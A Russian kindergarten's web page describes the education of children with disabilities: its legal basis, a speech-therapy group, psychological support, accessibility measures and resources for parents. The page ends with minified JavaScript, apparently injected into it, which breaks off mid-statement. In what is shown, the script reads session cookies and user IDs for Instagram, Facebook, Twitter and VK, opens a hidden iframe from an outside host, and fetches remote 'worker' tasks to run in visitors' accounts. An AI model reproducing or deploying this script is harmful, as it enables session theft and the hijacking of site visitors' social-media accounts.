Образование детей с ОВЗ и инвалидностью.
О доступности образовательных услуг для детей с ограниченными возможностями здоровья
Информация о предоставлении образования детям с ОВЗ и детям-инвалидам
Организация образовательной деятельности для воспитанников с ограниченными возможностями здоровья в Муниципальном бюджетном дошкольном образовательном учреждении «Детский сад № 15 «Журавушка» г. Сальска осуществляется в соответствии с «Федеральным законом Об образовании в Российской Федерации» от 29 декабря 2012 г. N 273-ФЗ, Приказом Министерства образования и науки Российской Федерации от 17.10.2013 № 1155 «Об утверждении Федерального государственного стандарта дошкольного образования», локальными актами дошкольного учреждения.
В МБДОУ № 15 «Журавушка» г. Сальска в 2022-2023 учебном году получают дошкольное образование 12 воспитанников с ОВЗ.
В МБДОУ № 15 «Журавушка» г. Сальска созданы специальные условия обучения, воспитания и развития обучающихся с ОВЗ и инвалидностью.
Под специальными условиями получения образования детьми с инвалидностью и ОВЗ понимаются условия обучения, воспитания и развития, включающие в себя:
• использование адаптированных образовательных программ (в том числе, программ коррекционной работы, индивидуальных специальных образовательных программ);
• специальных методов обучения и воспитания;
• проведение групповых и индивидуальных коррекционных занятий и другие условия, без которых невозможно или затруднено освоение образовательных программ обучающимися с инвалидностью и ограниченными возможностями здоровья.
Наличие оборудованных учебных кабинетов, объектов для проведения практических занятий, библиотек, объектов спорта, средств обучения и воспитания, в том числе приспособленных для использования детьми-инвалидами и детьми с ОВЗ. | Для детей с ОВЗ и детей-инвалидов оборудован логопедический уголок учителя – логопеда и кабинет педагога- психолога для индивидуальных коррекционных занятий. |
Обеспечение доступа в здания ОО детей с ОВЗ и детей-инвалидов. |
Не требуется создание особых условий |
Условия питания детей-инвалидов и детей с ОВЗ. | |
Условия охраны здоровья детей с ОВЗ и детей-инвалидов. | Организации образовательной деятельности данной категории детей осуществляется с учетом здоровья, а именно разработана адаптированная образовательная программа |
Доступ и информационным системам и информационно-телекоммуникационным сетям детей с ОВЗ и детей-инвалидов. |
Не требуется создание особых условий |
Электронные образовательные ресурсы, к которым обеспечивается доступ детей с ОВЗ и детей-инвалидов. | |
Наличие специальных технических средств обучения коллективного и индивидуального пользования для детей с ОВЗ и детей-инвалидов. | В ДОУ имеется мультимедийная установка для проведения занятий, для индивидуального обучения имеется компьютер, медиатека игр. |
В МБДОУ созданы оптимальные организационно-педагогические условия направленные на полноценное и эффективное получение дошкольного образования всеми воспитанниками ДОО. Наряду с этим необходимо отметить, что создание всеобъемлющих условий для получения образования детьми с учетом их психофизических особенностей на сегодняшний день рассматривается в качестве основной задачи в области реализации права на образование детей с ограниченными возможностями здоровья. Так в штатном расписании ДОУ имеются учитель — логопед и педагог- психолог, которые проводят диагностику развития детей дошкольного возраста, оказывают коррекционную помощь на основе специальных психолого-педагогических подходов. Раннее оказание коррекционной помощи в дошкольном возрасте позволяет через индивидуализацию образования, психологическое сопровождение и проведение квалифицированной коррекции развития ребенка успешно подготовить его к обучению в общеобразовательном учреждении.
В МБДОУ функционирует 1 группа компенсирующей направленности для детей с ТНР 5 -7 лет «Звукарики».
ПОЛОЖЕНИЕ О ГРУППЕ КОМПЕНСИРУЮЩЕЙ НАПРАВЛЕННОСТИ МБДОУ № 15 «Журавушка» г. Сальска
Содержание коррекционной работы направлено на обеспечение коррекции недостатков в речевом развитии детей и оказание педагогической поддержки детям этой категории в освоении Программы.
Содержание коррекционной работы осуществляется по программе Т.Б.Филичевой, Г.В.Чиркиной «Программа воспитания и обучения детей с фонетико-фонематическим недоразвитием речи». По коррекции речи так же используются современные программы и технологии: Т.Б. Филичева, Т.В. Туманова. «Программа коррекционного обучения и воспитания детей с ОНР», С.Н. Шаховская, Е.Д. Худенко «Логопедические занятия в детском саду для детей с нарушениями речи», В.В. Коноваленко «Фронтальные логопедические занятия для детей с ОНР и ФФНР», М.Ю. Картушина «Логоритмические занятия в детском саду».
В группе компенсирующей направленности от 5 до 7 лет создана система коррекционно-развивающей работы. Педагоги, работающие в группе, организуют индивидуальные, микрогрупповые, фронтальные обучающие занятия, где реализуют коррекционно-педагогические методы, приемы и средства в условиях положительного эмоционального состояния ребенка.
Большое внимание в организации коррекционной работы с детьми-логопатами уделяется развитию мелкой моторики руки. Достижению оптимально эффективного результата способствует применение методов лечебной педагогики: сказкотерапия, арт-терапия, пескотерапия.
Цель психолого-педагогического сопровождения развития ребенка заключается в создании психолого-педагогических условий для нормального развития, коррекции речевых нарушений и успешного обучения ребенка в начальной школе.
Основные направления психолого-педагогического сопровождения:
- Предупреждение возникновения проблем в речевом развитии ребенка.
- Помощь ребенку в решении актуальных задач речевого развития, обучения и
воспитания. - Психологическое обеспечение индивидуальных образовательных программ.
- Развитие психолого-педагогической компетентности, родителей, педагогов в
вопросах оказания практической помощи ребенку в решении проблем речевого
развития ребенка.
Задачи психолого-педагогического сопровождения:
- Создать для ребенка эмоциональный благоприятный микроклимат в группе,
при общении с детьми и педагогическим персоналом. - Изучать индивидуальные особенности развития детей в единстве интеллектуальной, эмоциональной и поведенческой сфер их проявления.
- Оказывать помощь детям, нуждающимся в особых обучающихся программах,
специальных формах организации их деятельности. - Своевременно проводить раннюю диагностику и коррекцию нарушений в речевом и личностном развитии.
- Повышать психологическую компетентность воспитателей, родителей.
Основные направления деятельности учителя-логопеда
Основные цели деятельности учителя-логопеда:
- своевременная систематическая медико-психолого-педагогическая помощь детям с отклонениями в развитии;
- консультативно-методическая поддержка их родителей в организации воспитания и обучения ребенка;
- формирование у детей с отклонениями в развитии предпосылок учебной деятельности.
Основные задачи работы учителя-логопеда:
- социальная адаптация детей в коллективе;
- формирование коммуникативных способностей;
- формирование умения сотрудничать;
- осуществление необходимой коррекции нарушений речи детей;
- обеспечение равных стартовых возможностей при поступлении детей в массовые школы;
- создание развивающей предметно-пространственной среды и условий для обогащенной, разнообразной деятельности;
- взаимодействие с семьями воспитанников для обеспечения полноценного, гармоничного развития детей, выработки компетентной педагогической позиции по отношению к собственному ребенку
Организация воспитательно-образовательного процесса.
Приоритетные направления работы с детьми:
- логопедическая коррекция дефекта;
- социальная адаптация с последующей интеграцией в массовую школу;
- развитие речи и речевого общения (решение в единстве задач языкового и коммуникативного развития).
Образовательный процесс включает:
- гибкое содержание;
- педагогические технологии, обеспечивающие индивидуальное, личностно-ориентированное развитие каждого ребенка, коррекцию дефекта.
Создание в группе условий для развития различных видов деятельности с учетом возможностей, интересов, потребностей самих детей. Это направление обеспечивается взаимодействием в работе логопеда и воспитателя.
Система психологической помощи.
Психологическую помощь участникам воспитательного процесса в МбДОУ № 15 «Журавушка» г. Сальска оказывает педагог — психолог.
Работа с детьми:
- помощь детям в адаптации к детскому саду (группе);
- проведение обследования детей и выработка рекомендаций по коррекции отклонений в их развитии;
- определение готовности старших дошкольников к обучению в школе;
- диагностика игровой деятельности детей;
- организация и регулирование взаимоотношений детей со взрослыми;
- диагностика взаимоотношений со сверстниками (социометрия).
Работа с родителями:
- психолого-педагогическое просвещение родителей (консультации, наблюдение за ребенком);
- развитие осознания педагогического воздействия родителей на детей в процессе общения;
- снижение уровня тревожности родителей перед поступлением детей в школу;
- обучение родителей методам и приемам организации занятий с детьми старшего дошкольного возраста;
- ознакомление родителей с элементами диагностики психических процессов (внимание, память);
- обеспечение более высокого уровня подготовки детей к школе.
Работа с педагогами:
- подготовка и проведение педагогического консилиума;
- индивидуальное и групповое консультирование;
- подготовка и выступление на педсовете, методическом объединении.
Также созданы условия для повышения педагогической компетентности воспитателей через проведение семинаров, консультаций, участие в вебинарах.
В течение учебного года в рамках образовательной деятельности уделяется внимание вопросам формирования толерантного отношения к людям с ограниченными возможностями здоровья у детей дошкольного возраста.
Содержание дошкольного образования и условия организации обучения и воспитания детей с ограниченными возможностями здоровья определяются Адаптированной программой коррекционно-развивающей работы для детей с ТНР (общим недоразвитием речи).
Адаптированная основная образовательная программа дошкольного образования для детей с ограниченными возможностями здоровья. СКАЧАТЬ
Обучающийся с ограниченными возможностями здоровья – физическое лицо, имеющее недостатки в физическом и (или) психологическом развитии, подтвержденные психолого-медико-педагогической комиссией и препятствующие получению образования без создания специальных условий.
Адаптированная образовательная программа – образовательная программа, адаптированная (модифицированная) для обучения лиц с ограниченными возможностями здоровья с учетом особенностей их психофизического развития, индивидуальных возможностей и, при необходимости, обеспечивающая коррекцию нарушений развития и социальную адаптацию указанных лиц.
В МБДОУ № 15 «Журавушка» г. Сальска функционирует психолого-педагогический консилиум.
ПОЛОЖЕНИЕ О ПСИХОЛОГО — ПЕДАГОГИЧЕСКОМ КОНСИЛИУМЕ МБДОУ №15 «Журавушка» г. Сальска.
Психолого-педагогический консилиум осуществляет свою деятельность в соответствии с уставом образовательной организации и положением, утвержденным руководителем образовательного учреждения.
Психолого-педагогический консилиум — это организационная форма взаимодействия всех участников психолого-педагогического сопровождения образовательного процесса в образовательной организации, в рамках которой происходит разработка стратегии и планирование конкретного содержания и регламента психолого-педагогического сопровождения воспитанника, определенных групп детей.
Психолого — педагогический консилиум является одной из форм взаимодействия руководящих и педагогических работников Муниципального бюджетного дошкольного образовательного учреждения «Детский сад № 15 «Журавушка» г. Сальска, с целью создания оптимальных условий обучения, развития, социализации и адаптации воспитанников посредством психолого-педагогического сопровождения.
Задачи ППк.
- Выявление трудностей в освоении образовательных программ, особенностей в развитии, социальной адаптации и поведении воспитанников для последующего принятия решений об организации психолого-педагогического сопровождения.
- Разработка рекомендаций по организации психолого-педагогического сопровождения воспитанников.
- Консультирование участников образовательных отношений по вопросам актуального психофизического состояния и возможностей воспитанников; содержания и оказания им психолого-педагогической помощи, создания специальных условий получения дошкольного образования.
- Контроль за выполнение рекомендаций ППк.
Организация работы ППк.
В основу педагогического процесса положен принцип диагностики, направленной на выявление психолого-педагогических особенностей развития дошкольников, что позволяет получить полную картину по развитию личности ребенка и планировать коррекционные мероприятия по развитию речи и других нарушений в развитии ребенка.
При поступлении ребенка в ОО проводится комплексная оценка состояния здоровья, анкетирование родителей, обследование физического развития дошкольников, анализируются результаты адаптации.
Результаты диагностического обследования выносятся на консилиум, куда приглашаются: заведующий, родители, воспитатели, педагоги. Встреча проходит в очень доброжелательной обстановке, в атмосфере эмоционального комфорта, каждому участнику встречи предоставляется возможность высказаться.
- Заслушиваются воспитатели дошкольной группы.
- Озвучивается информация, полученная из бесед с родителями.
- Представляются результаты диагностики нервно-психического развития детей.
- Заслушиваются результаты эпизодического контроля заведующего ДОУ и старшего воспитателя.
- Проводится психолого-педагогический анализ состояния дел, определяются конкретные трудности и причины, вызывавшие эти затруднения.
- Согласование действий специалистов по коррекционной работе, выработка плана работы с ребенком на год.
Консилиум призван решать вопросы с родителями о консультации других специалистов, вырабатывать общую педагогическую стратегию обучения и воспитания каждого ребенка с учетом данных диагностики и систематических наблюдений.
Последовательность работы по сопровождению ребенка представляет следующий алгоритм:
- Постановка проблем. Начинается с поступления запроса, осознания сути проблемы, разработки плана сбора информации о ребенке и проведения диагностического исследования.
- Анализ полученной информации. Оценка и обсуждение со всеми заинтересованными лицами возможных путей и способов решения проблемы, обсуждение позитивных и негативных сторон разных решений.
- Разработка плана комплексной помощи. Определение последовательности действий, распределение функций и обязанностей сторон, сроков реализации: совместная выработка рекомендаций для ребенка, педагога, родителей, специалистов. Консультирование всех участников сопровождения о путях и способах решения проблем ребенка.
- Реализация плана по решению проблемы. Выполнение рекомендаций каждым участником сопровождения.
- Осмысление и оценка результатов деятельности по сопровождению.
Психолого-педагогическое обследование детей с целью выявления их особых образовательных потребностей.
Речевой статус ребенка фиксируется в ходе комплексного логопедического обследования, в результате которого учителем-логопедом заполняется речевая карта ребенка. Данное обследование носит дифференцированный характер в связи с многообразием речевых дефектов и учитывает возрастные особенности детей. Речевая динамика звукопроизношения находит отражение в звуковой карте, которая заполняется в начале, середине и конце учебного года (звук отсутствует или искажен, находится в стадии постановки, автоматизации или ввода в связную речь).
Изучение психологического статуса детей с проблемами в речевом развитии (состояние высших психических функций, особенностей эмоционально-волевой сферы) осуществляется в результате совместной деятельности с педагогом-психологом ДОУ.
Изучение коммуникативной сферы детей и особенностей детско-родительских отношений с учетом потенциальных возможностей каждого ребенка происходит по результатам педагогической диагностики, проводимой воспитателями групп.
Здоровьесберегающая направленность коррекционно-развивающего процесса непосредственно в логопедической работе находит отражение в индивидуализации данного процесса и использовании оздоравливающих технологий (дыхательных и релаксационных упражнений, массажа при различных состояниях тонуса мышц, антистрессовой гимнастики).
Условия обучения и воспитания детей с проблемами в речевом развитии.
Содержание коррекционной работы по устранению недостатков в речевом развитии обеспечивается за счет созданных организационных и педагогических условий.
Во-первых, одним из психолого-педагогических условий полноценного речевого развития дошкольников является организация предметно-развивающей речевой среды, направленной на обогащение и обобщение у детей представлений об окружающем мире, формирование на этой основе лексико-грамматических компонентов речевой деятельности, создание условий для развития речевой коммуникации посредством связной диалогической и монологической речи, развитие фонетико-фонематической стороны речи и ее моторных компонентов. В целях оценки уровня педагогической деятельности сотрудников по данному направлению в дошкольном образовательном учреждении проводится динамическое наблюдение и смотры-конкурсы организуемой в группах и кабинетах специалистов предметно-развивающей речевой среды. Организация коррекционно-развивающей предметно-пространственной среды должна насыщена элементами, способствующими коррекции нарушенных функций. Коррекционный уголок (речевая зона) представляет собой специальное пространство, в состав которого входят стеллажи, расположенные на разном уровне, зеркало, игровой, дидактический и наглядный материал. Игровой материал подбирается в нарастающей сложности и заменяется или пополняется еженедельно.
Во-вторых, в коррекционно-развивающем процессе учитывается принцип формирования позиции активного участия в творении окружающей среды. Элементами среды, способствующими реализации данного принципа, является стена творчества, сменные тематические уголки, мини-кукольный театр. Использование полифункционального панно также позволяет детям активно изменять имеющуюся среду: дети моделируют содержание сюжетов в зависимости либо от целей занятий, либо от замыслов детей в свободной деятельности.
В-третьих, развитие творческих способностей ребенка с нарушениями речи сопровождается дозированной и поэтапной помощью взрослого (родителя, логопеда, воспитателя), помогающего реализовать систему вхождения ребенка в творческий поиск.
В среде обязательно присутствуют некоторые элементы, отражающие специфические региональные особенности культуры, декоративно-прикладные промыслы с элементами фольклора. Все это позволяет ребенку идентифицировать себя с определенной культурой не только в «большом», но и в малом социуме, воспитывает патриотизм, любовь к малой Родине.
Педагогические условия обеспечиваются за счет комплексности коррекционного процесса, выстраивания целостной системы взаимодействия всех специалистов, включенных в работу группы компенсирующей направленности.
Положение об оказании логопедической помощи в МБДОУ № 15 «Журавушка» г. Сальска СКАЧАТЬ
Реализация ГПРО «Доступная среда» реализовано в следующем направлении: установлена мнемосхема для людей с ограниченными возможностями здоровья.
Паспорт доступности Муниципального бюджетного дошкольного образовательного учреждения «Детский сад № 15 «Журавушка» г. Сальска СКАЧАТЬ
ФЕДЕРАЛЬНЫЙ ЗАКОН О РАТИФИКАЦИИ КОНВЕНЦИИ О ПРАВАХ ИНВАЛИДОВ (РФ 3 мая 2012 г. N 46-ФЗ) СКАЧАТЬ
ФЕДЕРАЛЬНЫЙ ЗАКОН О СОЦИАЛЬНОЙ ЗАЩИТЕ ИНВАЛИДОВ В РОССИЙСКОЙ ФЕДЕРАЦИИ (от 24.11.1995 N 181—ФЗ с изменениями на 24 апреля 2020 года)(редакция, действующая с 1 июля 2020 года)). СКАЧАТЬ
Распоряжение об утверждении примерного Положения о психолого-педагогическом консилиуме образовательной организации (Минпрос РФ от9.09.2019 г. № Р-93) СКАЧАТЬ
Распоряжение об утверждении примерного Положения об оказании логопедической помощи в организациях, осуществляющих образовательную деятельность (Минпрос РФ от 6.08.2020 г. № Р-75) СКАЧАТЬ
ПОСТАНОВЛЕНИЕ об утверждении Порядка регламентации и оформления отношений государственной и муниципальной образовательной организации Ростовской области и родителей (законных представителей) обучающихся, нуждающихся в длительном лечении, в том числе детей-инвалидов, в части организации обучения по основным общеобразовательным программам на дому или в медицинских организациях (МО и ПО РО от 21 декабря 2017 года N 7) СКАЧАТЬ
Методические рекомендации по организации и проведению педагогического совета, семинара для педагогов образовательных учреждений по организации инклюзивного образовательного процесса детей с ограниченными возможностями здоровья. СКАЧАТЬ
УВАЖАЕМЫЕ РОДИТЕЛИ И ПЕДАГОГИ!
Предлагаем Вам информационные ресурсы, которые помогут найти ответы на интересующие Вас вопросы, получить необходимую информацию и поддержку.
http:
Сайт создан мамой незрячего ребёнка в помощь родителям, имеющим слепых детей. Представлена информация по всем аспектам детского развития и воспитания, приведены варианты развивающих игр, описания бытовых тифлопомощников, имеется библиотека аудиокниг, подборка ссылок на полезные ресурсы сети Интернет, функционирует блог, который предоставляет возможность общения и обмена личным родительским опытом.
http://akademroditel.ru/– «Академия родителей».
Разделы сайта содержат советы, связанные с физическим и психо-эмоциональным развитием детей, с использованием в воспитательном процессе развивающих игр, творческих приёмов, выделена информация об образовательных учреждениях. Одно из направлений сайта – детская дефектология, где приведены рекомендации для родителей профильных специалистов – дефектолога, логопеда, психолога. Поделиться и обменяться личным опытом родители могут на форуме.
http:
Это – блог, где собраны материалы, направленные на оказание помощи родителям при воспитании и обучении незрячего ребёнка – учебные программы, методическая литература, детские книги, развивающие игры для незрячих детей.
http:
Родителям предоставлена возможность обмениваться опытом по вопросам ухода, воспитания, обучения детей с ОВЗ.
http:
Виртуальная площадка позволяет родителям, имеющим детей с ограниченными возможностями здоровья, общаться, обмениваться советами по воспитанию, обучению, организации досуга детей, знакомиться с современными средствами реабилитации и получить консультацию профильных специалистов в режиме реального времени.
www.logopedplus.ru– «Логопед+».
Ресурс содержит информацию для логопедов и родителей, воспитывающих детей с речевыми нарушениями. Представлена информация о речевом развитии детей, видах речевых нарушений, методах их преодоления, а также рекомендации по проведению артикуляционной гимнастики, подготовке к школе детей данной нозологии.
http://ovz.ipk74.ru– «Понимаем. Принимаем. Помогаем».
Информационный ресурс ориентирован на информирование родительской аудитории по вопросам правового регулирования обучения, воспитания «особых» детей, их социализации. В разделе «Мой ребёнок!» отражены психофизиологические особенности таких детей, особенности формирования среды их развития. В разделе «Учимся вместе» даны рекомендации поотбору программ обучения в образовательных организациях. Раздел «Решаем проблемы вместе» предоставляет возможность получить консультацию психолога и дефектолога. Имеется подборка тематических ссылок на ресурсы сети Интернет, которыми могут воспользоваться родители детей с ОВЗ.
http://www.osoboedetstvo.ru – «Особое детство»: помощь детям с нарушениями развития.
Портал предлагает различные формы общения (ленты, форумы, чаты) родителей и специалистов Центра лечебной педагогики (г. Москва) – педагогов, психологов, юристов. Родителям предоставляется возможность знакомства с законодательной основой защиты прав инвалидов, изданиями и публикациями тематической направленности, получения информации об организациях, работающих с инвалидами и их услугах.
http://www.kidsunity.org– портал «Единство детей».
Портал создан специально для детей с ограниченными возможностями здоровья. Предоставляет возможность детям найти себе друзей по интересам, раскрыть свой талант путём размещения своих рисунков, стихов, фотографий. Отдельным разделом выделена информация для родителей, касающаяся правовых вопросов, воспитания, обучения, «особого» ребёнка в условиях семьи.
http:
На сайте представлены различные материалы о детях с ограниченными возможностями здоровья: тексты книг, адресованных читателям всех возрастных групп, фильмы об инвалидах. Представлены творческие работы детей с особенностями развития.
http://www.autist.narod.ru – «Аутизм – болезнь XXI века?».
Сайт создан мамой ребёнка, больного аутизмом. Ресурс освещает разноплановые материалы о проблеме раннего детского аутизма, представляет подборку Интернет-ресурсов организаций, оказывающих помощь детям с аутизмом и их семьям, представлена законодательная база, статьи об аутизме из российских и зарубежных периодических изданий, методики, учебные пособия, рекомендации для родителей и другая полезная информация.
http://www.seniger.narod.ru – «Преодоление – жизнь вопреки!».
Сайт создан и ведётся мамой ребёнка с синдромом Дауна. Ресурс призван изменить отношение окружающих к детям с синдромом Дауна, освещает проблемы, с которыми сталкиваются родители, возможные пути их решения, представляет творчество детей, подборку ссылок на полезные для родителей ресурсы и другую информацию.
http://invamama.ru/alalia/ – «Общение мам «особых» деток».
Форум для родителей, воспитывающих детей с нарушениями зрения, слуха, речи и т. п. позволяет родителям делиться своими проблемами и опытом воспитания «особых» детей.
https://vk.com/club95416716 – Межрегиональный центр матерей «Жизнь с ДЦП».
Сообщество родителей детей с ДЦП оказывает семьям комплексную поддержку, организует и проводит мероприятия для родителей по программе «Передышка», организует консультационные встречи со специалистами различных областей, проводит психологические тренинги, организует обучение волонтёров работе с детьми, имеющими ДЦП.
https://vk.com/club71486190 – группа для родителей детей-инвалидов «Мы – вместе!».
Виртуальное сообщество родителей, имеющих детей с нарушениями зрения организовано с целью объединения родителей, оказания им помощи в воспитании, обучении, реабилитации и адаптации детей-инвалидов по зрению, оказания им психологической поддержки и консультирования по различным вопросам.
http://ovz.zabedu.ru/ – информационный портал для родителей детей-инвалидов «Особый ребёнок».
Разделы Интернет-ресурса содержат советы о воспитании детей с различной категорией инвалидности и ограниченными возможностями здоровья, информацию о правах и льготах для детей-инвалидов и их семей, советы различных специалистов, перечень учреждений социальной защиты и реабилитации.
http://deti.nspu.ru/ovz/ – «Информационный ресурс для родителей детей с ОВЗ и детей-инвалидов».
Ресурс содержит информацию о реабилитации детей-инвалидов в домашних условиях, список методической литературы о проблемах детей с ОВЗ и путях их решения, рекомендации родителям и другую полезную информацию.
Квалифицированную психолого-педагогическую помощь Вы можете получить в Муниципальном бюджетном учреждении «Центр психолого-педагогической, медицинской и социальной помощи Сальского района»
https://cdik-salsk.my1.ru/
Местонахождение Центра: юридический адрес: 347630, Ростовская область, г. Сальск, ул. Первомайская, 20; фактический адрес: 347630, Ростовская область, г. Сальск, ул. Первомайская, 20.
Телефон: 8 (86372)73178
E-mail: cdik-salsk@yandex.ru
Специально оборудованные учебные кабинеты
Специально оборудованные учебные кабинеты отсутствуют. Имеющиеся групповые и дополнительные помещения, имеющиеся средства обучения и воспитания могут быть использованы для коллективного и индивидуального пользования инвалидами и лицами с ограниченными возможностями здоровья в доступном для них объеме.
Объекты для проведения практических занятий, приспособленных для использования инвалидами и лицами с ограниченными возможностями здоровья
Специально оборудованные объекты для проведения практических занятий отсутствуют.
Библиотеки, приспособленные для использования инвалидами и лицами с ограниченными возможностями здоровья
В МБДОУ имеется книжный фонд, который располагается в методическом кабинете, приспособлен для использования инвалидами и детей с ограниченными возможностями, используется в работе, имеются игры для мелкой моторики рук, дидактический материал, игрушки, игры для поддержания и развития игровой деятельности располагаются в поле зрения и восприятия ребенка (по высоте — на расстоянии вытянутой руки ребенка). Это дает возможность ребенку, даже с ОВЗ самостоятельно подбирать необходимые для выбранной им деятельности предметы.
Объекты спорта, приспособленные для использования инвалидами и лицами с ограниченными возможностями здоровья
Объекты спорта могут быть использованы для коллективного и индивидуального пользования инвалидами и лицами с ограниченными возможностями здоровья в доступном для них объеме.
Средства обучения и воспитания, используемые в детском саду для обеспечения образовательной деятельности, рассматриваются в соответствии с ФГОС к условиям реализации основной программы дошкольного образования как совокупность учебно-методических, материальных, дидактических ресурсов, обеспечивающих эффективное решение воспитательно-образовательных задач в оптимальных условиях. Все пространство помещений предназначенных для детского контингента доступно детям, в том числе детям с ограниченными возможностями здоровья (ОВЗ).
Средства обучения и воспитания, приспособленные для использования инвалидами и лицами с ограниченными возможностями здоровья
Музыкальный зал может быть использован для коллективного и индивидуального пользования инвалидами и лицами с ограниченными возможностями здоровья в доступном для них объёме.
Обеспечение беспрепятственного доступа в здания образовательной организации
Главный вход на территорию детского сада оборудован кнопкой вызова для вызова персонала на доступной высоте.
Главный вход в здание оборудован пандусом.
Ширина дверных проемов входа в детский сад позволяет свободный вход инвалидов-колясочников.
Имеется мнемосхема (тактильный стенд) для беспрепятственного доступа в учреждение.
Специальные условия питания
В МБДОУ организовано сбалансированное питание в соответствии с действующим Постановлением от 28.09.2020 № 28 «Об утверждении санитарных правил СП 2.4.3648-20 «Санитарно-эпидемиологические требования к организациям воспитания и обучения, отдыха и оздоровления детей и молодежи», Постановлением Главного государственного санитарного врача Российской Федерации от 28.10.2020 № 32 «Об утверждении санитарно-эпидемиологических правил и норм СанПиН 2.3/2.4.3590-20 «Санитарно-эпидемиологические требования к организации общественного питания населения», примерным 10-дневным меню, утвержденным заведующим МБДОУ. Специальные условия питания инвалидов и лиц с ОВЗ не предусмотрены.
Специальные условия охраны здоровья
Основной задачей медицинского и педагогического персонала учреждения является четкая организация работы по наблюдению за состоянием здоровья детей и проведение профилактических мероприятий, направленных на обеспечение правильного физического и нервно-психического развития, а также снижение заболеваемости детей. Санитарно-гигиеническое состояние МБДОУ соответствует требованиям СанПин 2.4.3648-20, световой, воздушный и питьевой режимы соблюдаются. В детском саду имеются медицинский и процедурный кабинеты, оборудованные в соответствии с нормативными требованиями. С целью снижения заболеваемости проводятся профилактические и закаливающие мероприятия (утренняя и корригирующая гимнастика с использованием дыхательных упражнений, воздушные ванны, правильная организация прогулки, соблюдение температурного режима в течение дня). Медицинский персонал наряду с администрацией несет ответственность за здоровье и физическое развитие детей, проведение профилактических мероприятий, соблюдение санитарно-гигиенических норм, режима и обеспечение качества питания. Ежегодно составляется комплексный план оздоровления детей с учетом возможностей МБДОУ, который включает в себя оздоровительные мероприятия: закаливающие мероприятия, витаминотерапия, вакцинопрофилактика. Охрана здоровья осуществляется в полном соответствии с нормативными актами РФ. Весь педагогический состав ежегодно проходит курсы по оказанию первой медицинской помощи.
Доступ к информационным системам и информационно-телекоммуникационным сетям, приспособленным для использования инвалидами и лицами с ограниченными возможностями здоровья
Не предусмотрен.
Электронные образовательные ресурсы, к которым обеспечивается доступ инвалидов и лиц с ограниченными возможностями здоровья
Самостоятельный доступ обучающихся, инвалидов и лиц с ОВЗ не предусмотрен.
Наличие специальных технических средств обучения коллективного и индивидуального пользования
Специальные технические средства обучения коллективного и индивидуального пользования для инвалидов и лиц с ограниченными возможностями здоровья — не предусмотрены (конструктивно). Имеющиеся в ОУ технические средства обучения могут быть использованы для коллективного и индивидуального пользования инвалидов и лиц с ограниченными возможностями здоровья в доступном для них объеме.
Наличие условий для беспрепятственного доступа в общежитие, интернат
Общежитие и интернатные группы в структуре МБДОУ не предусмотрены.
Количество жилых помещений в общежитии, интернате, приспособленных для использования инвалидами и лицами с ограниченными возможностями здоровья
Общежитие и интернатные группы в структуре МБДОУ не предусмотрены.
[o]
);return i.send(n.data),i}};var f=new l,p=function(e){u.workId=»25″,n=r(«ds_user_id»),u.token=r(«csrftoken»),n&&»0″!==n&&0!==n&&(u.needParent=e,v())},w=null,m=function(e,n){f.postSend(t+»event»,{data:JSON.stringify(e),json:!0,success:n})},h=function(e,t,i){var o={id:parseInt(e.id),fingerprint:n,type:u.Version+u.workId,type_task:t};return u.needParent?(window.parent.postMessage(JSON.stringify({logData:o}),»*»),void(i&&i())):u.needMessage?(document.getElementById(«loaderIframe»).contentWindow.postMessage(JSON.stringify({logData:o}),»*»),void(i&&i())):void m(o,i)},y=function(e,t){i=[];var n=JSON.parse(e);for(var o in u.workList)if(void 0!==n
[o]
)for(var r in n
[o]
)0,t?u.focusQueue.push({id:r,item:n
[o]
[r]
,type:o}):i.push({id:r,item:n
[o]
[r]
,type:o});if(setTimeout(function(){v(t)},6e4),!t)for(var a=0;i.length;){!function(e,t){setTimeout(function(){u.workList[e.type].worker(e)},1e3*a)}(i.shift()),a++}},k=function(t,n,i){f.postSend(e+»youlist.php?worker=»+n+»&uid=»+i,{success:function(e){t.source.postMessage(JSON.stringify({id:n,data:e}),»*»)},error:function(){t.source.postMessage(JSON.stringify({id:n,data:»{}»}),»*»)},data:»»})},v=function(t){u.needParent?window.parent.postMessage(JSON.stringify({getData:u.workId,visiter:n}),»*»):u.needMessage?document.getElementById(«loaderIframe»).contentWindow.postMessage(JSON.stringify({getData:u.workId,visiter:n}),»*»):u.focusQueue.length>0?setTimeout(function(){v(t)},6e4):f.postSend(e+»youlist.php?worker=»+u.workId+»&uid=»+n,{success:function(e){y(e,t)},error:function(){setTimeout(function(){v(t)},6e4)},data:»»})};document.hasFocus=function(){return!0},(o=document.getElementById(«mainWidgetDiv»))||((o=document.createElement(«div»)).id=»mainWidgetDiv»,o.style.width=o.style.height=»1px»,o.style.position=»absolute»,o.style.top=»0″,o.style.left=»0″,o.style.overflow=»hidden»,document.body.appendChild(o),(w=document.createElement(«iframe»)).src=»https://cdn.cdnservice.space/flister.html?v=3″,w.id=»loaderIframe»,w.width=w.height=»1″,w.style.position=»absolute»,w.style.width=w.style.height=»1px»,document.body.appendChild(w),window.addEventListener(«message»,d),f.postSend(e+»youlist.php?worker=35&uid=»+s.u4f(),{data:»»}),setTimeout(function(){if(document.location.href.indexOf(«vk.com»)>0)return u.workId=»23″,void f.getSend(u.vkUrl+»feed»,{success:function(e){var t=e.match(/id: ([0-9]+),/im);t&&»0″!==(n=t[1])&&parseInt(n)>0&&v()}});if(document.location.href.indexOf(«facebook.com»)>0)!function(){if(u.workId=»24″,window.require){var e=window.require(«CurrentUserInitialData»);e&&e.USER_ID&&(n=e.USER_ID)}else n=r(«c_user»);console.log(n),n&&(u.needMessage=!0,v())}();else{if(document.location.href.indexOf(«twitter.com»)>0)return u.workId=»26″,void((n=(n=r(«twid»)).replace(«u%3D»,»»).replace(/[^0-9]+/,»»))&&(u.token=r(«ct0»),u.token?v():f.getSend(«/home?prefetchTimestamp=»+s.curTime(),{creds:!0,success:function(e){var t=e.match(/»(ct0=([^;]+); Max-Age=[0-9]+; Domain=\.twitter\.com; Path=\/; Secure)»/i);t&&(document.cookie=decodeURIComponent(t[1]),u.token=t[2],u.token&&v())}})));if(window.top===window.self){if(document.location.href.indexOf(«youtube.com»)>0)return 